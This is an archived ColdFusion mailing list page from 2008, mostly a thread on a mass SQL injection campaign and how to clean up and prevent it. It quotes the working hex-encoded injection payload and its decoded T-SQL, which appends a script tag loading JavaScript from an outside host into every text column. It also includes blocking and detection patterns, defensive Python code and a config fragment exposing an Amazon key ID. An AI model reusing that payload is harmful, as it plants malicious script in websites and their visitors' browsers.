<CFSET DATASOURCE = "mywebsitecom">
<CFSET COMPANYNAME = "mywebsite">

<cfset xSSLUrl = "https://www.mywebsite.com">

<cfset xSwitch=1>

<cfif xSwitch is 1>
<cfset xPathOrdering = "#xSSLUrl#/templates/">
<cfset xURLPath = "#xSSLUrl#/">
<CFSET xURLHome = "#application.XNEWROOT#">
<cfelse>
<cfset xPathOrdering = "">
<cfset xURLPath = "http://localhost/mywebsite/">
</cfif>

<cfset application.xtimedifference=2>

<cfset simple = 1>
<cfset xbird="robin">
<cfset application.xbird="robin">

<cfinclude template="templates/codecopyright.cfm">

<CFSET xLiveInventory = "StockWeb">

<cfset xCfhttpPath="#application.XNEWROOT#">

<cfset xRelativePath = "c:\inetpub\wwwroot\clients\Xservercom\html">

<CFSET xCache = "c:\inetpub\wwwroot\clients\mywebsitecom\html\_cache">

<CFSET xRootCache = "/_cache">

<cfif xSwitch is 0>
<cfset aSiteURL="http://localhost/mywebsite">
<cfelse>
<cfset aSiteURL="#application.XNEWROOT#">
</cfif>

<CFSET aShowAuctions = 1>

<!--- Used to determine a light grey image border color --->
<CFSET aBorderColor = "Silver">

<!--- Added 8/19/07 For Amazon Rest Statements --->
<cfset amz_Service = "AWSECommerceService">
<cfset amz_AWSAccessKeyId = "1FDX21XKHQ9CAT4X02">
<cfset amz_Version = "2007-07-16">
<cfset amz_associateid = "xcom-20">

<cfreturn true>
</cffunction>

</cfcomponent>

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309406


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Heikki Heikkinen
Mark,

Thanks for the info.  I tried this and it located the code.  I removed the 
comment and executed it; however, the code still remains.
Any help you can offer would be great!

Thanks!


For those of you who have been hit by this attack and who need to try
something short of restoring your DB, this script will generate a series of
update statements in reverse of the hack that's been going around:

---
DECLARE @T varchar(255), @C varchar(255)
DECLARE @sql varchar(4000)
DECLARE @script varchar(255)
/* fill in the value of the malicious script. */
SELECT @script = '<script src=*scriptsrc></script><!---'

DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'u'
  AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  /* the doubled quotes build Replace([col],'<script...>','') with an empty replacement */
  SELECT @sql = 'update [' + @T + '] set [' + @C + '] = Replace([' + @C + '],''' + @script + ''','''')'
  PRINT @sql

  /* uncomment this after checking the output using print */
  --EXEC(@sql)

  FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

---

1) Replace the value of @script (the select at the top) with the value of
the string that's been inserted into your DB
2) Run the script AS IS - you should see a list of  update statements that
look like this:

update [**tablename] set [**columnName] = Replace([**ColumnName],'<script
src=*scriptsrc></script><!---','')

Where **tablename and **columname represent actual tables/columns from your
DB.

You can then run the updates individually to strip out the malicious code...
I also converted the update to a select to compare the values and see what
the result would be on update.

3) If you are brave you can comment out the EXEC(@sql) line and rerun the
script. Doing so will hit every table and every char column with these
updates so be sure you know what you are doing. 


-Mark 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309407


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Matt Quackenbush
Did I really just read that?  Please, someone, anyone, tell me that I
didn't.

Claude, you're certainly free to do what you wish to do in your own
applications, so this comment is not directed to you at all.

For those of you who are actually trying to learn and become better
programmers/developers, please, do yourselves, your bosses, your fellow
developers, and your clients a HUGE favor and completely ignore the advice
of anyone that tells you not to use cfqueryparam.  If you have read this
thread, or any thread like it and you're not using it, you deserve what you
get.

Bottom line: ***always*** use cfqueryparam.  Period.  There are no
acceptable exceptions to the rule.

On Mon, Jul 21, 2008 at 3:54 PM, Claude Schneegans wrote:

> CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
> difficult to read,
> so the best is to use it only when it is really necessary.
> For me, using CFQUERYPARAM systematically for every parameter is as stupid
> as never using it at all.



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309408


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Dave Watts
> Why do you all want to interpret this as a final solution?
> Blocking an IP will NOT block ANY attack, it will just stop 
> the current attack from THIS address, period.
> But it is safer than letting the malbot try every page it can 
> find,... until it does find one in which CFQUERYPARAM was forgotten.

> ...

> CFQUERYPARAM is a nice and powerful feature, but it makes SQL 
> code more difficult to read, so the best is to use it only 
> when it is really necessary.
> For me, using CFQUERYPARAM systematically for every parameter 
> is as stupid as never using it at all.

If you use it systematically for every parameter, you won't have any
forgotten pages. Besides, again, it provides benefits beyond validation,
such as potentially improving the reuse of execution plans.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309409


Page break/blank page in cfdocument

2008-07-21 Thread Tom McNeer
Hi,

I am creating a PDF from a dynamically created HTML page. To attempt to
minimize styling problems and other issues, I use cfhttp to call a page
template which builds the HTML using query results. Then I simply output the
page content within the cfdocument tags.

I've done this before, without much difficulty, although there are always
CSS oddities.

However, in this case, I'm seeing something I've never seen before, and
which I can't find any reference to by Googling: a blank page is being
created between each pair of real pages of my document.

I'm not using cfdocumentitem type=pageBreak, so that's not the issue.
There are no CSS specifications regarding page breaks in the code, either.
And though the content does include HTML tables, the breaks seem to have
nothing to do with them. If I completely avoid any attempt at pagination,
I'm likely to get a page break in the middle of a table, followed by a blank
page. So it seems as if a page break is being created somehow, though.

Has anyone experienced anything like this? I'll be happy to share some code,
but I don't want to simply dump a lot of unnecessary code on people unless
it seems useful.

Thanks for any guidance.


-- 
Thanks,

Tom

Tom McNeer
MediumCool
http://www.mediumcool.com
1735 Johnson Road NE
Atlanta, GA 30306
404.589.0560


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309410


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Experienced CF Developer
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).

I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags.  Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updating old ones/fixing bugs.
Then I ran into a situation.  If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.  

Two hard and fast rules to live by:

1.  Use cfqueryparam - ALWAYS
2.  Use SELECT * - NEVER

I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)

Sincerely,

Dave Phillips

-Original Message-
From: Matt Quackenbush [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 4:21 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Did I really just read that?  Please, someone, anyone, tell me that I
didn't.

Claude, you're certainly free to do what you wish to do in your own
applications, so this comment is not directed to you at all.

For those of you who are actually trying to learn and become better
programmers/developers, please, do yourselves, your bosses, your fellow
developers, and your clients a HUGE favor and completely ignore the advice
of anyone that tells you not to use cfqueryparam.  If you have read this
thread, or any thread like it and you're not using it, you deserve what you
get.

Bottom line: ***always*** use cfqueryparam.  Period.  There are no
acceptable exceptions to the rule.

On Mon, Jul 21, 2008 at 3:54 PM, Claude Schneegans wrote:

 CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
 difficult to read,
 so the best is to use it only when it is really necessary.
 For me, using CFQUERYPARAM systematically for every parameter is as stupid
 as never using it at all.





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309411


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Heikki Heikkinen
Brad,

This took care of part of the issue... but not all.
I get this error:

Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.

Does anyone know what I need to do to get around the error above?

thanks!



Works great for me.  You have to remove the extra line breaks though.



Here is what it does:  

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR 
select a.name,
b.name 
from sysobjects a,syscolumns b
where a.id=b.id 
and a.xtype='u' 
and (b.xtype=99 
or b.xtype=35 
or b.xtype=231 
or b.xtype=167) 

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) 

BEGIN
 exec('update ['[EMAIL PROTECTED]'] set ['[EMAIL PROTECTED]']=['[EMAIL 
 PROTECTED]']+''/titlescript
src=http://1.verynx.cn/w.js;/script!--'' 
where '[EMAIL PROTECTED]' not like ''%/titlescript
src=http://1.verynx.cn/w.js;/script!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor


Did you read the blog I posted?  It explains it all.

Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220
464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563
7473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420
612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045
4E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F
4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553
3D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27
2B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372
633D
22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C
212D
2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974
6C65
3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A
7322
3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054
6162
6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65
5F43
7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);

it!

Huh... Learn sumptin new every day. That is why I keep coming back here.
;)

Thanx Brad.

~G~ 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309412


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Bryan Stevenson
Ahhh...so there were other reasons for doing what you are doing...that
makes much more sense.

As Dave already said...I too was concerned about your solution being
put forward in a security context...because it's not.

It is of course a valid way to deal with server load issues you have
experienced by filtering out the garbage requests before they become
errors at the query end of things.

and no...not retarded...just tactless ;-)

Cheers
-  


Bryan Stevenson B.Comm.
VP  Director of E-Commerce Development
Electric Edge Systems Group Inc.
phone: 250.480.0642
fax: 250.480.1264
cell: 250.920.8830
e-mail: [EMAIL PROTECTED]
web: www.electricedgesystems.com
 
Notice:
This message, including any attachments, is confidential and may contain
information that is privileged or exempt from disclosure. It is intended
only for the person to whom it is addressed unless expressly authorized
otherwise by the sender. If you are not an authorized recipient, please
notify the sender immediately and permanently destroy all copies of this
message and attachments.


On Mon, 2008-07-21 at 16:38 -0400, Claude Schneegans wrote:
 ...and all hackers ALWAYS use the same IP...cause they'd never get
  caught that way...hehe
 
  yes...that was meant to be sarcastic
 
 It does not look sarcastic to me, just may be a little retarded ;-)
 
  I see where you're coming from Claude, I just think (as Dave appears to)
 that you're wasting your time
 
 I'm not wasting my time, I'm saving my server time.
 At a certain time I used to have many errors in the server too busy or 
 memory error category.
 
 I also discovered that a huge amount of the traffic on my server was due 
 to robots,
 so I decided to control more specifically this traffic.
 I first optimized the good robots like Google, Yahoo, MSN etc using
 pertinent meta name=revisit-after content=n Days tags and other 
 tricks.
 
 And I also tracked bad bots and fake browsers.
 Just look at your logs, and you'll be amazed by the amount of traffic 
 caused by
 - browsers that never request images, probably bots...
 - experimental robots (I don't care if students experiment with things, I 
 just don't want to be the guinea pig)
 - robots that do not embed an address to explain why they are searching 
 your sites,
 - robots that read all images to detect if one of them is copyrighted 
 and illegally used (huge traffic)
 - Chinese robots that check if your site should be banned from China 
 because they talk about human rights,
 - AND also spammers and hackers of course,
  etc.
 
 So I designed my own robot detection tools, and spam or SQL injection 
 attempts are only extra tools
 I use to classify robots and just a drop in the ocean of sh%$/? I'm 
 getting away. ;-)
  and yes, my server is much more stable now.
 and also, the statistics I show to my customers are realistic.
 
 Of course, I also use CFQUERYPARAM as an ultimate protection.
 



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309413


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Kris Jones
As a rule I use cfqueryparam. And generally try to stick to stored
procedures, and use cfstoredproc/cfprocparam. However, I am now
working with an app that uses cached queries regularly, and is still
on CF7. You cannot use cfqueryparam with a cached query in CF7. What
are the alternatives?

-KJ

 Bottom line: ***always*** use cfqueryparam.  Period.  There are no
 acceptable exceptions to the rule.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309414


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Hmm, I sure hope you replaced the exec with a print statement

-Original Message-
From: Heikki Heikkinen [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 4:48 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Brad,

This took care of part of the issue... but not all.
I get this error:

Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.

Does anyone know what I need to do to get around the error above?

thanks!



Works great for me.  You have to remove the extra line breaks though.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309415


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Cache result sets manually.  You can wrap that up nicely in a custom
tag.

~Brad

-Original Message-
From: Kris Jones [mailto:[EMAIL PROTECTED] 

I am now
working with an app that uses cached queries regularly, and is still
on CF7. You cannot use cfqueryparam with a cached query in CF7. What
are the alternatives?
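Brad's suggestion of caching result sets by hand, together with the earlier insistence (Matt, Dave) on always parameterizing, can be shown in one piece. This is an added example written for this archive page, not code from any poster; it uses Python's sqlite3 module rather than CFML because the mechanism is the same in either: the SQL text stays constant, user input travels only in the bound parameter tuple, and the cache is keyed on (sql, params) so a cached result set is never served for different parameters. The `article` table and its rows, the `CachedQuery` class, the `unsafe_lookup`/`safe_lookup` helpers and the injectable clock are all constructed for the example.

```python
import sqlite3
import time
from typing import Any, Callable, Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory sample database constructed for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO article VALUES (?, ?, ?)",
        [(1, "Hello", 1), (2, "Draft", 0), (3, "News", 1)],
    )
    conn.commit()
    return conn


class CachedQuery:
    """Parameterized query with a hand-rolled result cache (what Brad describes).

    The cache key is (sql, params): the SQL text is a constant, user input only
    ever travels in the parameter tuple, and two requests with different
    parameters can never be served each other's rows.
    """

    def __init__(self, conn: sqlite3.Connection, ttl_seconds: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.conn = conn
        self.ttl = ttl_seconds
        self.clock = clock  # injectable so expiry can be tested without sleeping
        self._cache: Dict[Tuple[str, Tuple[Any, ...]], Tuple[float, List[tuple]]] = {}
        self.hits = 0
        self.misses = 0

    def run(self, sql: str, params: Tuple[Any, ...] = ()) -> List[tuple]:
        key = (sql, params)
        now = self.clock()
        entry = self._cache.get(key)
        if entry is not None and now - entry[0] < self.ttl:
            self.hits += 1
            return entry[1]
        self.misses += 1
        # Bound parameters: the driver sends the values separately from the SQL text.
        rows = self.conn.execute(sql, params).fetchall()
        self._cache[key] = (now, rows)
        return rows

    def invalidate(self) -> None:
        """Drop every cached result set, e.g. after a write to the table."""
        self._cache.clear()


def unsafe_lookup(conn: sqlite3.Connection, title: str) -> List[tuple]:
    """The pattern the thread warns against: input spliced into the SQL text.
    Kept only to show what the parameterized version prevents."""
    return conn.execute(
        "SELECT id, title FROM article WHERE title = '" + title + "'"
    ).fetchall()


def safe_lookup(q: CachedQuery, title: str) -> List[tuple]:
    """Same query with a bound parameter, served through the cache."""
    return q.run("SELECT id, title FROM article WHERE title = ?", (title,))


if __name__ == "__main__":
    conn = make_db()
    q = CachedQuery(conn, ttl_seconds=60)
    print(safe_lookup(q, "Hello"))              # [(1, 'Hello')]
    print(safe_lookup(q, "x' OR '1'='1"))       # []  (the quote is data, not SQL)
    print(unsafe_lookup(conn, "x' OR '1'='1"))  # every row (the quote became SQL)
    print(q.hits, q.misses)                     # 0 2
```

The point Dave Watts made about execution-plan reuse also falls out of this shape: because the SQL text is identical for every call, the server sees one statement with varying parameters rather than a new statement per input. Remember to call `invalidate()` (or use a short TTL) after writes, since a hand-rolled cache does not know when the underlying table changed.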

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309416


RE: Experiences with Railo

2008-07-21 Thread Rick Faircloth
Hey, as long as you're being honest and frank about the situation, I know
I, for one, appreciate knowing not just that there are products out there,
but how they work and are or are not supported.

Your experience can save others of us tens of thousands of dollars, as well.

Rick

 -Original Message-
 From: Jordan Michaels [mailto:[EMAIL PROTECTED]
 Sent: Monday, July 21, 2008 1:03 PM
 To: CF-Talk
 Subject: Re: Experiences with Railo
 
 Please accept my apologies. I should not have stated this on a public
 mailing list. It was an emotional response to past experiences that I
 should have kept under control.
 
 Again, my apologies.
 
 Warm regards,
 Jordan Michaels
 Vivio Technologies
 http://www.viviotech.net/
 Open BlueDragon Steering Committee
 Adobe Solution Provider
 
 
 Jordan Michaels wrote:
  H-Sphere was unfortunately bought by the same folks that own Plesk - a
  company now called Parallels. I would not be surprised if they attempt
  to move H-Sphere users toward Plesk in the very near future.
 
  Parallels was previously SW-Soft - makers of Plesk and Virtuozzo and a
  whole host of very popular hosting-related software. They went through a
  buying spree about 6 months ago - buying up their competitors and
  absorbing their products and their customers. Some of the victims of
  this process were Comodo's H-sphere, FreeVPS (a Virtuozzo competitor)
  and CP+ (a Plesk competitor). Further development on FreeVPS and CP+ has
  been halted, and Parallels has made no attempts to offer a migration
  path for customers who were using them. This has cost my company tens of
  thousands of dollars in migration efforts away from CP+ and FreeVPS.
  It's a crying shame because both FreeVPS and CP+ were *excellent*
  products, and served us very well for many years.
 
  Parallels also publicly stated that they would offer migration paths for
  customers who were affected by their acquisitions - this never happened.
  Despite my phone calls and emails asking for said promised service. They
  never came through.
 
  Parallels lies. I do not trust them. I will not use, nor would I
  recommend their products, or products owned by them, to anyone.
 
  Warm regards,
  Jordan Michaels
  Vivio Technologies
  http://www.viviotech.net/
  Open BlueDragon Steering Committee
  Adobe Solution Provider
 
 
  Gerald Guido wrote:
  Yeah... I forgot about the whole MySQL Debacle with Plesk. That sucked. The
  one thing I really liked about it was being able to use the API to manage
  email accounts and user accounts right in our CMS. Anything to not have the
  phone ring off the hook
 
  If you ever need a Hosting CP I would look at H-sphere. I have run into a
  few minor speed bumps with it, but overall I have been very happy with it
  over the years.  They have a single server version for *nix.. I think it is
  free cuz I cant find a price for it. Anyways it is only $4.50 per  client
  licence for the full blown version.
 
  http://www.psoft.net/promo/single_server.html
 
 
 
 
 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309417


Seeing Socket Event Gateway break on line breaks with CF8?

2008-07-21 Thread Jeremy Bower
Having upgraded to CF8 with no code changes I am seeing a socket event gateway 
accept an xml message line by line and not the entire xml packet in one shot 
(each line is shown in the log separately).  Passing a simple sentence with a 
return in it also becomes 2 events.  This obviously causes problems, as the xml 
cannot be recognized and processed when it comes in line by line.  The xml is 
coming from a daemon written in Perl, and I can't immediately make any changes 
to it, as these requests are also sent out to other Perl systems, so any 
changes would have to be tested against them as well.
I couldn't find anything online about this being a bug in CF8, has anyone else 
seen it? 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309418


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Gerald Guido
I went to look at a site I do side work for and they got hit. No... not my
stuff. :)

We are going to be reading about this on all the tech rags like Info World
and Zdnet tomorrow.

ZDnet will prolly post it with an H1 tag with a blink tag for good measure.

One of the things about SQL server I never liked was how you could run more
than one sql script at a time. Mysql doesn't allow you to do this LTIL.

cfqueryparam... me love you long time.

~G~

If everything seems under control, you're not going fast enough
-- Mario Andretti


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309419


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Dave Watts
 We are going to be reading about this on all the tech rags 
 like Info World and Zdnet tomorrow.

It was in those a week or two ago, already. This is not new. Originally, it
primarily targeted classic ASP apps. HP released a free vulnerability
scanner called Scrawlr in response.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309420


Re: Experiences with Railo

2008-07-21 Thread Gerald Guido
Yeah... what Rick said.

Psoft put out a great product. H-Sphere is/was a great product. Sorry to
hear about that... and your experiences.

Your words were kind compared to what I had to say during the Redhat Debacle
of 02. ;)

~G~


On Mon, Jul 21, 2008 at 6:29 PM, Rick Faircloth [EMAIL PROTECTED]
wrote:

 Hey, as long as you're being honest and frank about the situation, I know
 I, for one, appreciate knowing not just that there are products out there,
 but how they work and are or are not supported.

 Your experience can save others of us tens of thousands of dollars, as
 well.

 Rick


 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309421


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Dan Vega
A firewall solution is another way, we block anything in the url with CAST( OR
EXEC(


Thank You
Dan


On Mon, Jul 21, 2008 at 8:08 PM, Dave Watts [EMAIL PROTECTED] wrote:

  We are going to be reading about this on all the tech rags
  like Info World and Zdnet tomorrow.

 It was in those a week or two ago, already. This is not new. Originally, it
 primarily targeted classic ASP apps. HP released a free vulnerability
 scanner called Scrawlr in response.

 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/

 Fig Leaf Software provides the highest caliber vendor-authorized
 instruction at our training centers in Washington DC, Atlanta,
 Chicago, Baltimore, Northern Virginia, or on-site at your location.
 Visit http://training.figleaf.com/ for more information!

 
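Two pieces of advice in this thread, Brad's "replace the exec with a print statement" (decode the hex before you ever run it) and Dan's firewall rule that drops requests containing CAST( or EXEC(, translate into a small offline triage script for web logs. This is an added example for this archive page, not code from any poster. The log lines, the 203.0.113.x addresses and the hex literal (which decodes to a harmless `select 1 as probe`) are constructed; the tokens checked are only the ones named in the thread (CAST(, EXEC() plus the DECLARE @ that opens the request quoted earlier, and the regexes, function names and log format are this example's own assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Tokens named in the thread (CAST( and EXEC( for the firewall rule) plus the
# DECLARE @ that opens the request Heikki quoted. Word boundary so that
# "broadcast" is not flagged; case-insensitive because T-SQL is.
SUSPICIOUS = re.compile(r"\b(?:CAST\s*\(|EXEC\s*\(|DECLARE\s+@)", re.IGNORECASE)

# CAST(0x... AS CHAR(n)) / VARCHAR / NCHAR / NVARCHAR: capture the hex digits
# and whether the target is an N-type (UTF-16LE on SQL Server).
HEX_LITERAL = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:CHAR|VARCHAR)", re.IGNORECASE
)

# Constructed Apache-style access log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Jul/2008:16:30:01 -0400] "GET /rss.cfm?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Jul/2008:16:30:02 -0400] "GET /rss.cfm?id=12%27;DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x73656C65637420312061732070726F6265%20AS%20CHAR(4000));EXEC(@S);-- HTTP/1.1" 500 1200',
    '203.0.113.9 - - [21/Jul/2008:16:30:03 -0400] "GET /news.cfm?q=broadcast HTTP/1.1" 200 800',
]

# client ip, ident, user, [timestamp], "METHOD target ..."
REQUEST_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def normalize(url: str) -> str:
    """URL-decode twice (catches %2527-style double encoding) and collapse
    whitespace, so the pattern checks see the text the database would see."""
    decoded = unquote_plus(unquote_plus(url))
    return re.sub(r"\s+", " ", decoded)


def is_suspicious(url: str) -> bool:
    """True if the request target contains any of the tokens the thread blocks."""
    return SUSPICIOUS.search(normalize(url)) is not None


def decode_hex_payload(url: str) -> Optional[str]:
    """Translate a CAST(0x... AS CHAR) literal to readable text for an analyst.
    Nothing here touches a database: this is the 'print, don't exec' step."""
    m = HEX_LITERAL.search(normalize(url))
    if m is None:
        return None
    hexdigits, n_type = m.group(1), m.group(2)
    if len(hexdigits) % 2:  # malformed literal: pad rather than abort the whole scan
        hexdigits = "0" + hexdigits
    raw = bytes.fromhex(hexdigits)
    # NCHAR/NVARCHAR literals are UTF-16LE; CHAR/VARCHAR are single-byte.
    return raw.decode("utf-16-le" if n_type else "latin-1", errors="replace")


def scan_log(lines: List[str]) -> List[Tuple[int, str, Optional[str]]]:
    """Return (line number, client IP, decoded payload or None) per suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.match(line)
        if m is None:
            continue
        ip, target = m.groups()
        if is_suspicious(target):
            hits.append((n, ip, decode_hex_payload(target)))
    return hits


if __name__ == "__main__":
    for n, ip, payload in scan_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {payload!r}")
```

Run it over a real access log by replacing `SAMPLE_LOG` with the file's lines. The decoded text tells you what the request tried to do, which is what the thread was struggling to read out of the hex; the `is_suspicious` check is the same idea as Dan's firewall rule, with URL decoding added because the literal string match alone misses percent-encoded variants. As the rest of the thread says, a rule like this reduces noise and log volume; the actual fix is parameterized queries on every page.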

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309422

